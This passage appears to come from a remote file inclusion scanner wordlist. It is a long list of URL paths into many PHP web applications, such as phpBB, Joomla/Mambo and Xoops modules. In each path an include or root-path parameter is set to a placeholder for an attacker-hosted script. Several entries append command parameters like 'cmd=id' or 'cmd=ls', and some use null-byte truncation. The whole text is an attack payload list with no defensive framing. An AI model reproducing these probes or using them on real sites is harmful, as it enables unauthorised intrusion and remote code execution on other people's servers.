/includes/tumbnail.php?config[root_ordner]=XXpathXX?
|
||||
/includes/usercp_register.php?phpbb_root_path=XXpathXX?
|
||||
/includes/usercp_viewprofile.php?phpbb_root_path=XXpathXX?
|
||||
/includes/xhtml.php?d_root=XXpathXX?
|
||||
/index.php3?Application_Root=XXpathXX
|
||||
/index.php?1=lol&PAGES[lol]=XXpathXX
|
||||
/index.php?AML_opensite=XXpathXX
|
||||
/index.php?AMV_openconfig=1&AMV_serverpath=XXpathXX
|
||||
/index.php?CONFIG[MWCHAT_Libs]=XXpathXX?
|
||||
/index.php?ConfigDir=XXpathXX
|
||||
/index.php?DIR_PLUGINS=XXpathXX
|
||||
/index.php?G_JGALL[inc_path]=XXpathXX%00
|
||||
/index.php?HomeDir=XXpathXX
|
||||
/index.php?Lang=AR&Page=XXpathXX
|
||||
/index.php?Madoa=XXpathXX?
|
||||
/index.php?RP_PATH=XXpathXX
|
||||
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
|
||||
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
|
||||
/index.php?abg_path=XXpathXX?
|
||||
/index.php?abs_path=XXpathXX?
|
||||
/index.php?adduser=true&lang=XXpathXX
|
||||
/index.php?adodb=XXpathXX
|
||||
/index.php?ads_file=XXpathXX
|
||||
/index.php?arquivo=XXpathXX
|
||||
/index.php?back=XXpathXX
|
||||
/index.php?base==XXpathXX
|
||||
/index.php?basePath=XXpathXX
|
||||
/index.php?bibtexrootrel=XXpathXX?
|
||||
/index.php?blog_dc_path=XXpathXX
|
||||
/index.php?blog_theme=XXpathXX
|
||||
/index.php?body=XXpathXX
|
||||
/index.php?class_path=XXpathXX?
|
||||
/index.php?classified_path=XXpathXX?
|
||||
/index.php?cms=XXpathXX?
|
||||
/index.php?config["sipssys"]=XXpathXX
|
||||
/index.php?config[root_ordner]=XXpathXX?&cmd=id
|
||||
/index.php?config[root_ordner]=XXpathXX?cmd=id
|
||||
/index.php?config_atkroot=XXpathXX
|
||||
/index.php?configuration=XXpathXX
|
||||
/index.php?custom_admin_path=XXpathXX?
|
||||
/index.php?dateiPfad=XXpathXX?&cmd=ls
|
||||
/index.php?de=XXpathXX
|
||||
/index.php?dept=XXpathXX
|
||||
/index.php?do=XXpathXX
|
||||
/index.php?exec=XXpathXX?
|
||||
/index.php?ext=XXpathXX
|
||||
/index.php?faq_path=XXpathXX?&cmd=id
|
||||
/index.php?file_name[]=XXpathXX?
|
||||
/index.php?file_path=XXpathXX?
|
||||
/index.php?fileloc=XXpathXX
|
||||
/index.php?from=XXpathXX
|
||||
/index.php?func=XXpathXX?
|
||||
/index.php?function=XXpathXX
|
||||
/index.php?function=custom&custom=XXpathXX
|
||||
/index.php?gOo=XXpathXX
|
||||
/index.php?gen=XXpathXX
|
||||
/index.php?get=XXpathXX
|
||||
/index.php?home_name=XXpathXX
|
||||
/index.php?ilang=XXpathXX?
|
||||
/index.php?inc_dir=XXpathXX
|
||||
/index.php?inc_dir=XXpathXX?
|
||||
/index.php?includeDir=XXpathXX
|
||||
/index.php?includeFooter=XXpathXX
|
||||
/index.php?includesdir=XXpathXX
|
||||
/index.php?insPath=XXpathXX
|
||||
/index.php?lang=XXpathXX
|
||||
/index.php?language=XXpathXX?
|
||||
/index.php?language=en&main_page=XXpathXX
|
||||
/index.php?lizge=XXpathXX?&cmd=ls
|
||||
/index.php?lng=XXpathXX
|
||||
/index.php?load=XXpathXX
|
||||
/index.php?loadpage=XXpathXX
|
||||
/index.php?main_tabid=1&main_content=XXpathXX
|
||||
/index.php?may=XXpathXX
|
||||
/index.php?middle=XXpathXX
|
||||
/index.php?mode=XXpathXX
|
||||
/index.php?modpath=XXpathXX
|
||||
/index.php?module=PostWrap&page=XXpathXX
|
||||
/index.php?mosConfig_absolute_path=XXpathXX
|
||||
/index.php?news7["functions"]=XXpathXX
|
||||
/index.php?news_include_path=XXpathXX
|
||||
/index.php?open=XXpathXX
|
||||
/index.php?option=com_custompages&cpage=XXpathXX?
|
||||
/index.php?page=XXpathXX
|
||||
/index.php?page=XXpathXX%00
|
||||
/index.php?page=XXpathXX?
|
||||
/index.php?pageXXpathXX
|
||||
/index.php?page[path]=XXpathXX?&cmd=ls
|
||||
/index.php?pagename=XXpathXX
|
||||
/index.php?pager=XXpathXX
|
||||
/index.php?pagina=XXpathXX?
|
||||
/index.php?path_to_folder=XXpathXX?cmd=id
|
||||
/index.php?pg=XXpathXX?
|
||||
/index.php?phpbb_root_path=XXpathXX
|
||||
/index.php?plugin=XXpathXX
|
||||
/index.php?principal=XXpathXX
|
||||
/index.php?proMod=XXpathXX
|
||||
/index.php?proMod=XXpathXX?cmd
|
||||
/index.php?project=XXpathXX
|
||||
/index.php?repinc=XXpathXX?
|
||||
/index.php?root_prefix=XXpathXX
|
||||
/index.php?root_prefix=XXpathXX?
|
||||
/index.php?section=XXpathXX
|
||||
/index.php?site=XXpathXX
|
||||
/index.php?site_path=XXpathXX
|
||||
/index.php?styl[top]=XXpathXX??
|
||||
/index.php?template=XXpathXX?
|
||||
/index.php?templates_dir=XXpathXX?
|
||||
/index.php?theme=XXpathXX
|
||||
/index.php?themepath=XXpathXX?
|
||||
/index.php?themesdir=XXpathXX
|
||||
/index.php?this_path=XXpathXX?
|
||||
/index.php?txt=XXpathXX
|
||||
/index.php?up=XXpathXX
|
||||
/index.php?url=XXpathXX
|
||||
/index.php?w=XXpathXX
|
||||
/index.php?way=XXpathXX??????????????
|
||||
/index1.php?=XXpathXX
|
||||
/index1.php?inc=XXpathXX
|
||||
/index1.php?inhalt=XXpathXX
|
||||
/index2.php?=XXpathXX
|
||||
/index2.php?content=XXpathXX
|
||||
/index2.php?s=XXpathXX
|
||||
/index2.php?x=XXpathXX
|
||||
/indexinfo.php?bibtexrootrel=XXpathXX?
|
||||
/indexk.php?lib_path=XXpathXX?
|
||||
/info.php?file=XXpathXX
|
||||
/inhalt.php?dateien[news]=XXpathXX?
|
||||
/init.php?API_HOME_DIR=XXpathXX
|
||||
/init.php?scriptpath=XXpathXX?
|
||||
/initialize.php?hmail_config[includepath]=XXpathXX&cmd=dir
|
||||
/initiate.php?abs_path=XXpathXX
|
||||
/install.php?_NE[AbsPath]=XXpathXX
|
||||
/install.php?install_dir=XXpathXX
|
||||
/install/config.php?path=XXpathXX
|
||||
/install/di.php?pathtoserverdata=XXpathXX
|
||||
/install/index.php?content_php=XXpathXX
|
||||
/install/install3.php?database=none&cabsolute_path=XXpathXX
|
||||
/integration/shortstat/configuration.php?SPL_CFG[dirroot]=XXpathXX?
|
||||
/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=XXpathXX?
|
||||
/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=XXpathXX?
|
||||
/interface/billing/billing_process.php?srcdir=XXpathXX?
|
||||
/interface/editors/-custom.php?bField[bf_data]=XXpathXX
|
||||
/interface/editors/custom.php?bField[bf_data]=XXpathXX
|
||||
/interface/new/new_patient_save.php?srcdir=XXpathXX?
|
||||
/intern/admin/?rootdir=XXpathXX
|
||||
/intern/admin/other/backup.php?admin=1&rootdir=XXpathXX
|
||||
/intern/clan/member_add.php?rootdir=XXpathXX
|
||||
/intern/config/forum.php?rootdir=XXpathXX
|
||||
/intern/config/key_2.php?rootdir=XXpathXX
|
||||
/ip.inc.php?type=1&cgipath=XXpathXX
|
||||
/ipeer_site/?page=XXpathXX?
|
||||
/joinus.php?vwar_root=XXpathXX
|
||||
/joinus.php?vwar_root=XXpathXX?&cmd=ls
|
||||
/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=XXpathXX?
|
||||
/joomla_path/components/com_articles.php?absolute_path=XXpathXX?
|
||||
/js/bbcodepress/bbcode-form.php?BBCODE_path=XXpathXX
|
||||
/js/wptable-tinymce.php?ABSPATH=XXpathXX
|
||||
/jscript.php?my_ms[root]=XXpathXX?
|
||||
/kernel/class/ixpts.class.php?IXP_ROOT_PATH=XXpathXX
|
||||
/kernel/loadkernel.php?installPath=XXpathXX
|
||||
/kmitaadmin/kmitam/htmlcode.php?file=XXpathXX?
|
||||
/ktmlpro/includes/ktedit/toolbar.php?dirDepth=XXpathXX
|
||||
/lang/leslangues.php?fichier=XXpathXX
|
||||
/lang_english/lang_main_album.php?phpbb_root_path=XXpathXX?a=
|
||||
/language/lang_english/lang_activity.php?phpbb_root_path=XXpathXX
|
||||
/language/lang_english/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
|
||||
/language/lang_german/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
|
||||
/language/lang_german/lang_main_album.php?phpbb_root_path=XXpathXX?a=
|
||||
/latestposts.php?forumspath=XXpathXX
|
||||
/latex.php?bibtexrootrel=XXpathXX?
|
||||
/layout/default/params.php?gConf[dir][layouts]=XXpathXX?
|
||||
/ldap/authldap.php?includePath=XXpathXX
|
||||
/learnPath/include/scormExport.inc.php?includePath=XXpathXX
|
||||
/lib.editor.inc.php?sys_path=XXpathXX?
|
||||
/lib/Loggix/Module/Calendar.php?pathToIndex=XXpathXX
|
||||
/lib/Loggix/Module/Comment.php?pathToIndex=XXpathXX
|
||||
/lib/Loggix/Module/Rss.php?pathToIndex=XXpathXX
|
||||
/lib/Loggix/Module/Trackback.php?pathToIndex=XXpathXX
|
||||
/lib/action/rss.php?lib=XXpathXX?
|
||||
/lib/activeutil.php?set[include_path]=XXpathXX?
|
||||
/lib/addressbook.php?GLOBALS[basedir]=XXpathXX
|
||||
/lib/armygame.php?libpath=XXpathXX
|
||||
/lib/authuser.php?root=XXpathXX
|
||||
/lib/base.php?BaseCfg[BaseDir]=XXpathXX
|
||||
/lib/connect.php?root=XXpathXX
|
||||
/lib/connected_users.lib.php3?ChatPath=XXpathXX
|
||||
/lib/connected_users.lib.php3?ChatPath=XXpathXX?
|
||||
/lib/db/mysql.class.php?root=XXpathXX
|
||||
/lib/db/postgres.class.php?root=XXpathXX
|
||||
/lib/functions.php?DOC_ROOT=XXpathXX
|
||||
/lib/googlesearch/GoogleSearch.php?APP[path][lib]=XXpathXX?
|
||||
/lib/header.php?DOC_ROOT=XXpathXX
|
||||
/lib/language.php?_LIB_DIR=XXpathXX
|
||||
/lib/live_status.lib.php?ROOT=XXpathXX
|
||||
/lib/misc.php?root=XXpathXX
|
||||
/lib/nl/nl.php?g_strRootDir=XXpathXX
|
||||
/lib/obj/collection.class.php?GLOBALS[application][app_root]=XXpathXX
|
||||
/lib/obj/content_image.class.php?GLOBALS[application][app_root]=XXpathXX
|
||||
/lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
|
||||
/lib/pcltrace.lib.php?g_pcltar_lib_dir=XXpathXX
|
||||
/lib/rs.php?rootpath=XXpathXX
|
||||
/lib/selectlang.php?BBC_LANGUAGE_PATH=XXpathXX
|
||||
/lib/smarty/SmartyFU.class.php?system[smarty][dir]=XXpathXX?
|
||||
/lib/static/header.php?set_menu=XXpathXX
|
||||
/lib/tpl.inc.php?conf[classpath]=XXpathXX
|
||||
/libraries/comment/postComment.php?path[cb]=XXpathXX?a=
|
||||
/libraries/database.php?path=XXpathXX???
|
||||
/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=XXpathXX
|
||||
/libraries/pcl/pcltar.php?g_pcltar_lib_dir=XXpathXX
|
||||
/library/authorize.php?login_form=XXpathXX?
|
||||
/library/translation.inc.php?GLOBALS[srcdir]=XXpathXX?
|
||||
/libs/db.php?path_local=XXpathXX
|
||||
/libs/ftp.php?path_local=XXpathXX
|
||||
/libs/lom.php?ETCDIR=XXpathXX
|
||||
/libsecure.php?abs_path=XXpathXX?
|
||||
/license.php?CONFIG[MWCHAT_Libs]=XXpathXX?
|
||||
/link_main.php?phpbb_root_path=XXpathXX
|
||||
/linkadmin.php?page=XXpathXX?
|
||||
/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=XXpathXX?
|
||||
/list.php?phpbb_root_path=XXpathXX
|
||||
/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=XXpathXX
|
||||
/lms_path/modules/welcome.php?_LIB_DIR=XXpathXX
|
||||
/load_lang.php?_SERWEB[configdir]=XXpathXX
|
||||
/load_lang.php?_SERWEB[serwebdir]=XXpathXX
|
||||
/load_phplib.php?_PHPLIB[libdir]=XXpathXX
|
||||
/loader.php?GLOBALS=XXpathXX
|
||||
/local/lib/lcUser.php?LIBDIR=XXpathXX?
|
||||
/log.php?bibtexrootrel=XXpathXX?
|
||||
/login.php3?cl_headers=XXpathXX
|
||||
/login.php?base_dir=XXpathXX
|
||||
/login.php?blog_theme=XXpathXX
|
||||
/login.php?langfile=XXpathXX
|
||||
/login.php?pachtofile=XXpathXX
|
||||
/login.php?srcdir=XXpathXX?
|
||||
/login.php?value=XXpathXX??
|
||||
/lovecms/install/index.php?step=XXpathXX?
|
||||
/m2f/m2f_cron.php?m2f_root_path=XXpathXX
|
||||
/m2f/m2f_forum.php?m2f_root_path=XXpathXX
|
||||
/m2f/m2f_mailinglist.php?m2f_root_path=XXpathXX
|
||||
/m2f/m2f_phpbb204.php?m2f_root_path=XXpathXX
|
||||
/maguz.php?site=XXpathXX
|
||||
/mail/childwindow.inc.php?form=XXpathXX?
|
||||
/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=XXpathXX?
|
||||
/mail_this_entry/mail_autocheck.php?pm_path=XXpathXX?&cmd=ls
|
||||
/main.inc.php?pathtoscript=XXpathXX
|
||||
/main.php?config[search_disp]=true&include_dir=XXpathXX
|
||||
/main.php?id=XXpathXX
|
||||
/main.php?include_path=XXpathXX?
|
||||
/main.php?pageURL=XXpathXX
|
||||
/main.php?pagina=XXpathXX
|
||||
/main/forum/komentar.php?site_path=XXpathXX
|
||||
/main/main.php?pi=XXpathXX
|
||||
/main/ppcbannerclick.php?INC=XXpathXX?
|
||||
/main/ppcclick.php?INC=XXpathXX?
|
||||
/main_prepend.php?_SERWEB[functionsdir]=XXpathXX
|
||||
/mainpage.php?docroot=XXpathXX?cmd
|
||||
/mamboleto.php?mosConfig_absolute_path=XXpathXX
|
||||
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=XXpathXX
|
||||
/manage_songs.php?foing_root_path=XXpathXX
|
||||
/manager/admin/index.php?MGR=XXpathXX
|
||||
/manager/admin/p_ins.php?MGR=XXpathXX
|
||||
/manager/admin/u_ins.php?MGR=XXpathXX
|
||||
/manager/articles.php?_PX_config[manager_path]=XXpathXX
|
||||
/manager/static/view.php?propID=0&INC=XXpathXX
|
||||
/master.php?root_path=XXpathXX
|
||||
/mcNews/admin/header.php?skinfile=XXpathXX
|
||||
/mcf.php?content=XXpathXX
|
||||
/mcnews/admin/install.php?l=XXpathXX
|
||||
/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=XXpathXX
|
||||
/member.php?vwar_root=XXpathXX
|
||||
/member/usercp_menu.php?script_folder=XXpathXX
|
||||
/members/index.php?INC=XXpathXX?
|
||||
/members/registration.php?INC=XXpathXX?
|
||||
/members_help.php?hlp=XXpathXX?
|
||||
/membres/membreManager.php?include_path=XXpathXX?
|
||||
/menu.php3?cl_headers=XXpathXX
|
||||
/menu.php?functions_file=XXpathXX
|
||||
/mep/frame.php?chem=XXpathXX?
|
||||
/microcms/includes/file_manager/special.php?fm_includes_special=XXpathXX
|
||||
/middle.php?file=XXpathXX
|
||||
/migrateNE2toNE3.php?_NE[AbsPath]=XXpathXX
|
||||
/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=XXpathXX?
|
||||
/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=XXpathXX?
|
||||
/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=XXpathXX?
|
||||
/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=XXpathXX?
|
||||
/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=XXpathXX?
|
||||
/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=XXpathXX?
|
||||
/mini-pub.php/front-end/img.php?sFileName=XXpathXX?
|
||||
/minimal/wiki.php?page=XXpathXX?
|
||||
/misc/function.php3?path=XXpathXX?
|
||||
/mitglieder.php?config[root_ordner]=XXpathXX?&cmd=id
|
||||
/mkportal/include/user.php?MK_PATH=XXpathXX
|
||||
/mkportal/include/user.php?MK_PATH=XXpathXX?
|
||||
/mod/authent.php4?rootpath=XXpathXX
|
||||
/mod/image/index.php?config[pathMod]=XXpathXX
|
||||
/mod/liens/index.php?config[pathMod]=XXpathXX
|
||||
/mod/liste/index.php?config[pathMod]=XXpathXX
|
||||
/mod/special/index.php?config[pathMod]=XXpathXX
|
||||
/mod/texte/index.php?config[pathMod]=XXpathXX
|
||||
/mod_membre/inscription.php?chemin=XXpathXX?
|
||||
/mod_phpalbum/sommaire_admin.php?chemin=XXpathXX?
|
||||
/modernbill/include/html/config.php?DIR=XXpathXX
|
||||
/modifyform.html?code=XXpathXX
|
||||
/mods/business_functions.php?GALLERY_BASEDIR=XXpathXX
|
||||
/mods/config/load.inc.php?moddir=XXpathXX?
|
||||
/mods/http/load.inc.php?moddir=XXpathXX?
|
||||
/mods/ui_functions.php?GALLERY_BASEDIR=XXpathXX
|
||||
/module/forum/forum.php?fd=XXpathXX=';
|
||||
/module/forum/main.php?id=1&main_dir=XXpathXX?&
|
||||
/modules.php?name=XXpathXX&file=article&sid=2
|
||||
/modules/4nAlbum/public/displayCategory.php?basepath=XXpathXX
|
||||
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=XXpathXX
|
||||
/modules/Calendar/admin/update.php?calpath=XXpathXX?
|
||||
/modules/Calendar/calendar.php?calpath=XXpathXX?
|
||||
/modules/Calendar/scheme.php?calpath=XXpathXX?
|
||||
/modules/Discipline/CategoryBreakdownTime.php?FocusPath=XXpathXX
|
||||
/modules/Discipline/CategoryBreakdownTime.php?staticpath=XXpathXX
|
||||
/modules/Discipline/StudentFieldBreakdown.php?staticpath=XXpathXX
|
||||
/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
|
||||
/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
|
||||
/modules/My_eGallery/index.php?basepath=XXpathXX
|
||||
/modules/My_eGallery/public/displayCategory.php?basepath=XXpathXX
|
||||
/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=XXpathXX?
|
||||
/modules/NukeAI/util.php?AIbasedir=XXpathXX
|
||||
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=XXpathXX
|
||||
/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
|
||||
/modules/abook/foldertree.php?baseDir==XXpathXX?
|
||||
/modules/addons/plugin.php?doc_root=XXpathXX
|
||||
/modules/admin/include/config.php?doc_root=XXpathXX
|
||||
/modules/admin/include/localize.php?doc_root=XXpathXX
|
||||
/modules/agendax/addevent.inc.php?agendax_path=XXpathXX&cmd=id
|
||||
/modules/bank/includes/design/main.inc.php?bank_data[root]=XXpathXX?
|
||||
/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=XXpathXX
|
||||
/modules/birstday/birst.php?exbb[home_path]=XXpathXX?
|
||||
/modules/birstday/profile_show.php?exbb[home_path]=XXpathXX?
|
||||
/modules/birstday/select.php?exbb[home_path]=XXpathXX?
|
||||
/modules/blocks/headerfile.php?system[path]=XXpathXX
|
||||
/modules/calendar/index.php?inc_dir=XXpathXX
|
||||
/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=XXpathXX?
|
||||
/modules/calendar/mod_calendar.php?absolute_path=XXpathXX?
|
||||
/modules/certinfo/index.php?full_path=XXpathXX
|
||||
/modules/character_roster/include.php?mod_root=XXpathXX?
|
||||
/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=XXpathXX?
|
||||
/modules/coppermine/themes/default/theme.php?THEME_DIR=XXpathXX
|
||||
/modules/downloads/lib/LM_Downloads.php?pathToIndex=XXpathXX
|
||||
/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
|
||||
/modules/emails/index.php?full_path=XXpathXX
|
||||
/modules/events/index.php?full_path=XXpathXX
|
||||
/modules/fax/index.php?full_path=XXpathXX
|
||||
/modules/files/blocks/latest_files.php?system[path]=XXpathXX
|
||||
/modules/files/index.php?full_path=XXpathXX
|
||||
/modules/files/list.php?full_path=XXpathXX
|
||||
/modules/filters/headerfile.php?system[path]=XXpathXX
|
||||
/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=XXpathXX?
|
||||
/modules/forums/blocks/latest_posts.php?system[path]=XXpathXX
|
||||
/modules/global/inc/content.inc.php?sIncPath=XXpathXX?
|
||||
/modules/groupadm/index.php?full_path=XXpathXX
|
||||
/modules/groups/headerfile.php?system[path]=XXpathXX
|
||||
/modules/guestbook/index.php?CONFIG[local_root]=XXpathXX?
|
||||
/modules/history/index.php?full_path=XXpathXX
|
||||
/modules/home.module.php?repmod=XXpathXX?
|
||||
/modules/horoscope/footer.php?xoopsConfig[root_path]=XXpathXX
|
||||
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=XXpathXX
|
||||
/modules/info/index.php?full_path=XXpathXX
|
||||
/modules/links/blocks/links.php?system[path]=XXpathXX
|
||||
/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
|
||||
/modules/links/submit_links.php?rootdp=zZz&gsLanguage=XXpathXX
|
||||
/modules/log/index.php?full_path=XXpathXX
|
||||
/modules/mail/index.php?full_path=XXpathXX
|
||||
/modules/menu/headerfile.php?system[path]=XXpathXX
|
||||
/modules/messages/index.php?full_path=XXpathXX
|
||||
/modules/mod_as_category.php?mosConfig_absolute_path=XXpathXX
|
||||
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=XXpathXX
|
||||
/modules/mod_calendar.php?absolute_path=XXpathXX
|
||||
/modules/mod_flatmenu.php?mosConfig_absolute_path=XXpathXX
|
||||
/modules/mod_mainmenu.php?mosConfig_absolute_path=XXpathXX
|
||||
/modules/mod_weather.php?absolute_path=XXpathXX?
|
||||
/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=XXpathXX?
|
||||
/modules/newbb_plus/config.php?bbPath[root_theme]=XXpathXX
|
||||
/modules/newbb_plus/votepolls.php?bbPath[path]=XXpathXX
|
||||
/modules/news/blocks/latest_news.php?system[path]=XXpathXX
|
||||
/modules/newusergreatings/pm_newreg.php?exbb[home_path]=XXpathXX?
|
||||
/modules/organizations/index.php?full_path=XXpathXX
|
||||
/modules/phones/index.php?full_path=XXpathXX
|
||||
/modules/pms/index.php?module_path=XXpathXX???
|
||||
/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
|
||||
/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
|
||||
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=XXpathXX?
|
||||
/modules/presence/index.php?full_path=XXpathXX
|
||||
/modules/projects/index.php?full_path=XXpathXX
|
||||
/modules/projects/list.php?full_path=XXpathXX
|
||||
/modules/projects/summary.inc.php?full_path=XXpathXX
|
||||
/modules/punish/p_error.php?exbb[home_path]=XXpathXX?
|
||||
/modules/punish/profile.php?exbb[home_path]=XXpathXX?
|
||||
/modules/reports/index.php?full_path=XXpathXX
|
||||
/modules/search/index.php?full_path=XXpathXX
|
||||
/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX?
|
||||
/modules/settings/headerfile.php?system[path]=XXpathXX
|
||||
/modules/snf/index.php?full_path=XXpathXX
|
||||
/modules/syslog/index.php?full_path=XXpathXX
|
||||
/modules/tasks/index.php?full_path=XXpathXX
|
||||
/modules/tasks/searchsimilar.php?full_path=XXpathXX
|
||||
/modules/tasks/summary.inc.php?full_path=XXpathXX
|
||||
/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
|
||||
/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
|
||||
/modules/tml/block.tag.php?GLOBALS[PTH][classes]=XXpathXX
|
||||
/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=XXpathXX
|
||||
/modules/useradm/index.php?full_path=XXpathXX
|
||||
/modules/users/headerfile.php?system[path]=XXpathXX
|
||||
/modules/vWar_Account/includes/functions_common.php?vwar_root2=XXpathXX
|
||||
/modules/visitors2/include/config.inc.php?lvc_include_dir=XXpathXX?
|
||||
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=XXpathXX
|
||||
/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=XXpathXX
|
||||
/modules/xfsection/modify.php?dir_module=XXpathXX
|
||||
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=XXpathXX
|
||||
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
|
||||
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX?
|
||||
/modulistica/mdl_save.php?CLASSPATH=XXpathXX
|
||||
/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
|
||||
/moodle/admin/utfdbmigrate.php?cmd=XXpathXX
|
||||
/moosegallery/display.php?type=XXpathXX?&cmd=[command]
|
||||
/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=XXpathXX
|
||||
/moteur/moteur.php?chemin=XXpathXX?
|
||||
/movie_cls.php?full_path=XXpathXX
|
||||
/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
|
||||
/music/buycd.php?HTTP_DOCUMENT_ROOT=XXpathXX?
|
||||
/mutant_includes/mutant_functions.php?phpbb_root_path=XXpathXX
|
||||
/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=XXpathXX
|
||||
/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=XXpathXX
|
||||
/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
|
||||
/myphpcommander_path/system/lib/package.php?gl_root=XXpathXX?cmd
|
||||
/mysave.php?file=XXpathXX
|
||||
/naboard_pnr.php?skin=XXpathXX?
|
||||
/ncaster/admin/addons/archive/archive.php?adminfolder=XXpathXX
|
||||
/network_module_selector.php?path_prefix=XXpathXX
|
||||
/news.php?CONFIG[script_path]=XXpathXX?
|
||||
/news.php?config[root_ordner]=XXpathXX?&cmd=id
|
||||
/news.php?scriptpath=XXpathXX?
|
||||
/news.php?vwar_root=XXpathXX
|
||||
/news/include/createdb.php?langfile;=XXpathXX?
|
||||
/news/include/customize.php?l=XXpathXX?
|
||||
/news/newstopic_inc.php?indir=XXpathXX
|
||||
/news/scripts/news_page.php?script_path=XXpathXX?
|
||||
/newsadmin.php?action=XXpathXX
|
||||
/newsarchive.php?path_to_script=XXpathXX?&cmd=ls
|
||||
/newsfeeds/includes/aggregator.php?zf_path=XXpathXX
|
||||
/newsfeeds/includes/controller.php?zf_path=XXpathXX
|
||||
/newsletter/newsletter.php?waroot=XXpathXX
|
||||
/newsp/lib/class.Database.php?path=XXpathXX?
|
||||
/newticket.php?lang=XXpathXX
|
||||
/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=XXpathXX
|
||||
/noticias.php?inc=XXpathXX?
|
||||
/nucleus/plugins/skinfiles/index.php?DIR_LIBS=XXpathXX
|
||||
/nuke_path/iframe.php?file=XXpathXX
|
||||
/nukebrowser.php?filnavn=XXpathXX&filhead=XXpathXX&cmd=id
|
||||
/nuseo/admin/nuseo_admin_d.php?nuseo_dir=XXpathXX?
|
||||
/oaboard_en/forum.php?inc=XXpathXX
|
||||
/ocp-103/index.php?req_path=XXpathXX
|
||||
/ocs/include/footer.inc.php?fullpath=XXpathXX?
|
||||
/ocs/include/theme.inc.php?fullpath=XXpathXX?
|
||||
/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=XXpathXX?
|
||||
/olbookmarks-0.7.4/themes/test1.php?XXpathXX
|
||||
/oneadmin/adminfoot.php?path[docroot]=XXpathXX
|
||||
/oneadmin/blogger/sampleblogger.php?path[docroot]=XXpathXX?
|
||||
/oneadmin/config-bak.php?include_once=XXpathXX
|
||||
/oneadmin/config.php?path[docroot]=XXpathXX
|
||||
/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=XXpathXX?
|
||||
/online.php?config[root_ordner]=XXpathXX?&cmd=id
|
||||
/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=XXpathXX?
|
||||
/openi-admin/base/fileloader.php?config[openi_dir]=XXpathXX
|
||||
/openrat/themes/default/include/html/insert.inc.php?tpl_dir=XXpathXX???
|
||||
/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=XXpathXX
|
||||
/ops/gals.php?news_file=XXpathXX
|
||||
/order/login.php?svr_rootscript=XXpathXX
|
||||
/osData/php121/php121db.php?php121dir=XXpathXX%00
|
||||
/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=XXpathXX?
|
||||
/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=XXpathXX?
|
||||
/owimg.php3?path=XXpathXX
|
||||
/p-news.php?pn_lang=XXpathXX
|
||||
/pafiledb/includes/pafiledb_constants.php?module_root_path=XXpathXX
|
||||
/page.php?goto=XXpathXX
|
||||
/page.php?id=XXpathXX
|
||||
/panel/common/theme/default/header_setup.php?path[docroot]=XXpathXX
|
||||
